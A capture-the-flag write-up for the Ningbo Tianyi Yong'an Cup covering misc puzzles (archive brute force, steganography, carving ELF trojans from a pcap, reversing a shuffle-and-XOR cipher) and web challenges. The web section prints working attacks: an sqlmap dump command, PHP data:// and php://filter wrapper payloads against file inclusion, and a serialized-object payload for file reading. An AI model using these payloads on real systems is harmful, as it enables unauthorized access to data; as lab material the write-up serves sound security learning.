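Ningbo Tianyi Yong'an Cup (宁波天一永安杯)
This article was last updated 159 days ago; the information in it may have developed or changed since then.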

Misc

zip

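  • Based on the archive comment, guess that the password uses the character set 01 with a length of 1-9, then brute-force it to get the flag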

SimpleDocument

  • Carve the file with foremost to get a PDF, then simply Ctrl+A, Ctrl+C

BeautifulImage

  • LSB steganography, base64 steganography

hacker_traffic

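  • Carve files directly out of the capture, which yields an archive with a comment
    • password is (md5(virus_file) + lhost_ip)
  • The capture contains a large number of ELF trojan files
  • Write a script to extract them all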
import os

# Read the whole capture as raw bytes
a = open("hacker_traffic.pcapng", 'rb').read()
# Byte offsets in the capture at which each ELF file starts
b = [16055, 55019, 92151, 129283, 166415, 203547, 240679, 277811, 314943, 352075, 389207, 426339, 463471, 500603, 537735, 574867, 611999, 649131, 686263, 723395, 760527, 797659, 839291, 876423, 913555, 950687, 987819, 1024951, 1062083, 1099215, 1136347, 1173479, 1210611, 1247743, 1284875, 1322007, 1359139, 1396271, 1433403, 1470535, 1507667, 1544799, 1581931, 1619063, 1656195, 1693327, 1730459, 1767591, 1804723, 1841855, 1878987, 1916119, 1953251, 1990383, 2027515, 2064647, 2101779, 2138911, 2176043, 2213175, 2250307, 2287567, 2324699, 2361959, 2399091, 2436223, 2473355, 2510487, 2547619, 2584751, 2621883, 2659015, 2696147, 2733279, 2770411, 2807543, 2844675, 2881807, 2918939, 2956071, 2993203, 3030335, 3067467, 3104599, 3141731, 3178863, 3215995, 3253127, 3290259, 3327391, 3364523, 3401655, 3438787, 3475919, 3513051, 3550183, 3587315, 3624447, 3661579, 3698711]

os.makedirs("test", exist_ok=True)
for i in b:
    # 16896 bytes per file (33792 hex characters), named after its offset
    open(f"test/{i}", "wb").write(a[i:i + 16896])
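  • An IP address turns up; run it and capture the traffic, and conclude that this address is the lhost
  • Next, compute the MD5. The value does not match, possibly because there is extra data at the end, so write a script to generate a wordlist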
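from hashlib import md5

a = open('2287567', 'rb').read()
# One candidate per line: md5(file with i trailing bytes stripped) + lhost IP
with open('test.txt', 'w') as file:
    for i in range(len(a)):
        # len(a) - i instead of -i, so that i = 0 hashes the whole file
        file.write(md5(a[:len(a) - i]).hexdigest() + '192.168.3.201\n')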
  • Extracting the archive yields the encryption script
import base64
import random

from flag import secret

key = "x.x.x.x"  # masked key, shown as given


def encrypt_flag(flag, key):
    # Shuffle the 38 flag characters with a table seeded by the key
    random.seed(key)
    table = list(range(0, 38))
    random.shuffle(table)
    flag = [flag[i] for i in table]
    ascii_flag = [ord(c) for c in flag]
    # Reseed with the same key and draw a single-byte XOR key
    random.seed(key)
    xor_key = random.randint(0, 255)
    encrypted_flag = [c ^ xor_key for c in ascii_flag]
    return base64.b64encode(bytes(encrypted_flag)).decode("ascii")


print(encrypt_flag(secret, key))
# VFVWU1kGBgIMUlMBVFcBBgRRBFAHVFBVUFkbUB0DAQMEBVIGAlE=
  • Write a decryption script
import base64


def decrypt(t):
    # The XOR byte and the shuffle table are hard-coded here
    xor_key = 96
    table = [25, 28, 7, 24, 5, 0, 33, 21, 1, 31, 29, 2, 18, 27, 19, 13, 22, 9, 30, 10, 3, 11, 35, 15, 20, 16, 4, 23, 37, 36, 17, 32, 6, 34, 8, 26, 14, 12]
    # Undo base64 and the single-byte XOR
    shuffled = ''.join(chr(c ^ xor_key) for c in base64.b64decode(t))
    # Undo the shuffle: ciphertext position i came from flag position table[i]
    a = [''] * 38
    for i in range(38):
        a[table[i]] = shuffled[i]
    print(''.join(a))


decrypt("VFVWU1kGBgIMUlMBVFcBBgRRBFAHVFBVUFkbUB0DAQMEBVIGAlE=".encode())
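
The decryption script uses a fixed xor_key and table. As an added example (not part of the original writeup or the challenge files), the code below re-derives both from a key by replaying the encryption script's seeded random calls and checks the round trip; the names derive and decrypt_flag and the values SAMPLE_KEY and SAMPLE_FLAG are constructed for illustration.

```python
import base64
import random

FLAG_LEN = 38  # fixed by the challenge's table = list(range(0, 38))


def derive(key):
    """Replay the encryption script's two seeded draws for a given key."""
    random.seed(key)
    table = list(range(FLAG_LEN))
    random.shuffle(table)
    random.seed(key)  # the script reseeds before drawing the XOR byte
    xor_key = random.randint(0, 255)
    return table, xor_key


def encrypt_flag(flag, key):
    """Same transform as the challenge script: permute, XOR, base64."""
    table, xor_key = derive(key)
    shuffled = [flag[i] for i in table]
    return base64.b64encode(bytes(ord(c) ^ xor_key for c in shuffled)).decode("ascii")


def decrypt_flag(token, key):
    """Invert it: base64-decode, XOR, then undo the permutation."""
    table, xor_key = derive(key)
    shuffled = [chr(b ^ xor_key) for b in base64.b64decode(token)]
    if len(shuffled) != FLAG_LEN:
        raise ValueError(f"expected {FLAG_LEN} bytes, got {len(shuffled)}")
    plain = [""] * FLAG_LEN
    for pos, src in enumerate(table):
        plain[src] = shuffled[pos]  # ciphertext position pos came from flag[src]
    return "".join(plain)


# Constructed sample values (hypothetical, not the challenge's key or flag)
SAMPLE_KEY = "10.0.0.1"
SAMPLE_FLAG = "flag{" + "0123456789abcdef" * 2 + "}"  # 38 characters

if __name__ == "__main__":
    token = encrypt_flag(SAMPLE_FLAG, SAMPLE_KEY)
    print(token)
    print(decrypt_flag(token, SAMPLE_KEY))
```

Seeding random with a string gives different streams on Python 2 and Python 3, so the table and XOR byte only match when derived under the same major version that produced the ciphertext.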

Web

Query

  • Solved in one go with sqlmap
python sqlmap.py -u http://62be1f5b518e59a9.node.nsctf.cn/login.php --data="username=admin&password=admin" -D ctf -T f111 --dump --batch

codecheck

<!-- 
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    die("NONONO");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}-->
  • payload
?a=data://text/plain;base64,ZmxhZw==&b=php://filter/read=convert.base64-encode/resource=index.php&c=a&d=a

Deserialization

  • Read route.php
  • read=php://filter/read=convert.base64-encode/resource=route.php&input=1
  • read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1
  • read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:57:"php://filter/read=convert.base64-encode/resource=f14g.php";}